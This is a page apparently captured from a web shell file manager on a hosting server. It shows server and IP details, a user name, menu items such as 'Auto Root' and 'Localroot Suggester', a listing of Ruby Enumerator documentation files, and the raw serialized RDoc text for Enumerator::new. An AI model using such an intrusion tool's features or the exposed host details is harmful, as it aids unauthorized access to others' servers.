Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby27 /
share /
ri /
system /
Enumerator /
Delete
Unzip
Name
Size
Permission
Date
Action
ArithmeticSequence
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Chain
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Generator
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Lazy
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Producer
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Yielder
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
%2b-i.ri
515
B
-rw-r--r--
2023-06-06 18:25
cdesc-Enumerator.ri
3.39
KB
-rw-r--r--
2023-06-06 18:25
each-i.ri
1.53
KB
-rw-r--r--
2023-06-06 18:25
each_with_index-i.ri
538
B
-rw-r--r--
2023-06-06 18:25
each_with_object-i.ri
978
B
-rw-r--r--
2023-06-06 18:25
feed-i.ri
1.62
KB
-rw-r--r--
2023-06-06 18:25
inspect-i.ri
341
B
-rw-r--r--
2023-06-06 18:25
new-c.ri
1.56
KB
-rw-r--r--
2023-06-06 18:25
next-i.ri
929
B
-rw-r--r--
2023-06-06 18:25
next_values-i.ri
1.55
KB
-rw-r--r--
2023-06-06 18:25
peek-i.ri
808
B
-rw-r--r--
2023-06-06 18:25
peek_values-i.ri
986
B
-rw-r--r--
2023-06-06 18:25
produce-c.ri
1.79
KB
-rw-r--r--
2023-06-06 18:25
rewind-i.ri
453
B
-rw-r--r--
2023-06-06 18:25
size-i.ri
599
B
-rw-r--r--
2023-06-06 18:25
with_index-i.ri
724
B
-rw-r--r--
2023-06-06 18:25
with_object-i.ri
958
B
-rw-r--r--
2023-06-06 18:25
Save
Rename
U:RDoc::AnyMethod[iI"new:ETI"Enumerator::new;TT:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I">Creates a new Enumerator object, which can be used as an ;TI"Enumerable.;To:RDoc::Markup::BlankLine o; ; [I"DIn the first form, iteration is defined by the given block, in ;TI"Hwhich a "yielder" object, given as block parameter, can be used to ;TI"Nyield a value by calling the +yield+ method (aliased as <code><<</code>):;T@o:RDoc::Markup::Verbatim; [I"!fib = Enumerator.new do |y| ;TI" a = b = 1 ;TI" loop do ;TI" y << a ;TI" a, b = b, a + b ;TI" end ;TI" end ;TI" ;TI":fib.take(10) # => [1, 1, 2, 3, 5, 8, 13, 21, 34, 55] ;T:@format0o; ; [I"MThe optional parameter can be used to specify how to calculate the size ;TI"Jin a lazy fashion (see Enumerator#size). It can either be a value or ;TI"a callable object.;T@o; ; [I"MIn the deprecated second form, a generated Enumerator iterates over the ;TI"Igiven object using the given method with the given arguments passed.;T@o; ; [I"MUse of this form is discouraged. Use Object#enum_for or Object#to_enum ;TI" instead.;T@o;; [ I"3e = Enumerator.new(ObjectSpace, :each_object) ;TI"0 #-> ObjectSpace.enum_for(:each_object) ;TI" ;TI"Ce.select { |obj| obj.is_a?(Class) } # => array of all classes;T; 0: @fileI"enumerator.c;T:0@omit_headings_from_table_of_contents_below0I"]Enumerator.new(size = nil) { |yielder| ... } Enumerator.new(obj, method = :each, *args) ;T0[ I"(*args);T@3FI"Enumerator;TcRDoc::NormalClass00